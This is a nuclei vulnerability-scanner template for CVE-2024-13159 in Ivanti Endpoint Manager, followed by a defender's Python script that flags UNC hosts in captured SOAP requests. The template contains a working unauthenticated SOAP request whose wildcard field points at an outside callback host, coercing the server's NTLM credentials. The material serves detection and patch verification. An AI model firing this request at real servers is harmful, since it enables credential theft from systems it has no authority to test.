id: CVE-2024-13159

info:
  name: Ivanti EPM - Credential Coercion Vulnerability in GetHashForWildcardRecursive
  author: ritikchaddha
  severity: critical
  description: |
    A vulnerability in Ivanti Endpoint Manager (EPM) allows an unauthenticated attacker to coerce the EPM machine account credential via the GetHashForWildcardRecursive endpoint. The vulnerability exists due to improper input validation in the wildcard parameter, allowing an attacker to specify a remote UNC path that triggers NTLM authentication.
  impact: |
    Unauthenticated attackers can coerce NTLM authentication from the EPM server via UNC paths, allowing credential theft through man-in-the-middle attacks.
  remediation: |
    Update Ivanti Endpoint Manager (EPM) to a patched version that addresses CVE-2024-13159.
  reference:
    - https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13159
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-13159
    cwe-id: CWE-36
    epss-score: 0.94048
    epss-percentile: 0.99904
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:362091310
    fofa-query: icon_hash="362091310"
  tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev,vuln

variables:
  file: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: text/xml
        Soapaction: http://tempuri.org/GetHashForWildcardRecursive

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GetHashForWildcardRecursive xmlns="http://tempuri.org/">
              <wildcard>\\{{interactsh-url}}\tmp\{{file}}.txt</wildcard>
            </GetHashForWildcardRecursive>
          </soap:Body>
        </soap:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "<GetHashForWildcardRecursiveResponse")'
          - 'contains(content_type, "text/xml")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022047de1f30eb39f21316583cf234b2789c06dae75e0b0dbc840fecdc15c86933f9022100a1e6fe4d4398179913e69b12a2bfb5d1f360b9e12792c3bb4c5568f019472307:922c64590222798bb761d5b6d8e72950
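
Added example, not part of this template or of the nuclei-templates project: a defender-side check that parses captured SOAP request bodies for `GetHashForWildcardRecursive` and reports any `wildcard` value that is a UNC path to a host outside an allowlist. It assumes request bodies are available from a reverse proxy or WAF log; the function names, the allowlist and the sample hostnames are constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = "{http://tempuri.org/}"  # namespace used in the template's SOAP body


def wildcard_values(soap_body):
    """Return the <wildcard> values of GetHashForWildcardRecursive calls."""
    try:
        root = ET.fromstring(soap_body.encode("utf-8"))
    except ET.ParseError:
        return []  # not well-formed XML, nothing to extract
    return [(w.text or "").strip()
            for call in root.iter(NS + "GetHashForWildcardRecursive")
            for w in call.iter(NS + "wildcard")]


def unc_host(path):
    """Return the server name if `path` is a UNC path, else None."""
    p = path.replace("/", "\\")  # Windows accepts either separator
    for prefix in ("\\\\?\\UNC\\", "\\\\.\\UNC\\"):
        if p.upper().startswith(prefix):
            p = "\\\\" + p[len(prefix):]  # long-path UNC form -> \\host\share
            break
    else:
        if p.startswith(("\\\\?\\", "\\\\.\\")):
            return None  # local device path such as \\?\C:\dir
    if not p.startswith("\\\\"):
        return None  # drive-letter or relative path
    host = p[2:].split("\\", 1)[0]
    return host.lower() or None


def flag_request(soap_body, allowed_hosts=frozenset()):
    """Return the UNC hosts in the request that are not on the allowlist."""
    hosts = (unc_host(v) for v in wildcard_values(soap_body))
    return sorted({h for h in hosts if h and h not in allowed_hosts})


def envelope(value):
    """Build a constructed sample body shaped like the template's request."""
    return ('<?xml version="1.0" encoding="utf-8"?>'
            '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soap:Body><GetHashForWildcardRecursive xmlns="http://tempuri.org/">'
            f'<wildcard>{value}</wildcard>'
            '</GetHashForWildcardRecursive></soap:Body></soap:Envelope>')


if __name__ == "__main__":
    # Constructed samples; files.example.net is a placeholder hostname.
    for sample in (r"\\files.example.net\tmp\abcde.txt", r"C:\ProgramData\*.dll"):
        print(sample, "->", flag_request(envelope(sample)))
```

Any non-empty result for an unauthenticated request to `/WSVulnerabilityCore/VulCore.asmx` is worth correlating with outbound SMB or DNS traffic from the EPM server to the reported host.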